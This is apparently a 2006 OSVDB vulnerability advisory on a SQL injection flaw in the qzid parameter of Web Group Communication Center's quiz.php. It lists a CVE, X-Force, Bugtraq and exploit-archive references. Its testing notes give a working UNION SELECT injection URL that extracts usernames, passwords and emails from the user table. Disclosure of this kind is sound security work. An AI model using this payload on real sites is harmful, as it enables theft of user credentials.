Web Group Communication Center quiz.php qzid Variable SQL Injection

2006-10-20T21:50:55
ID OSVDB:34013
Type osvdb
Reporter OSVDB
Modified 2006-10-20T21:50:55

Description

Manual Testing Notes

/quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1++ userid=1 Change This

References:

ISS X-Force ID: 29712 Generic Exploit URL: http://milw0rm.com/exploits/2604 CVE-2006-5514 Bugtraq ID: 20653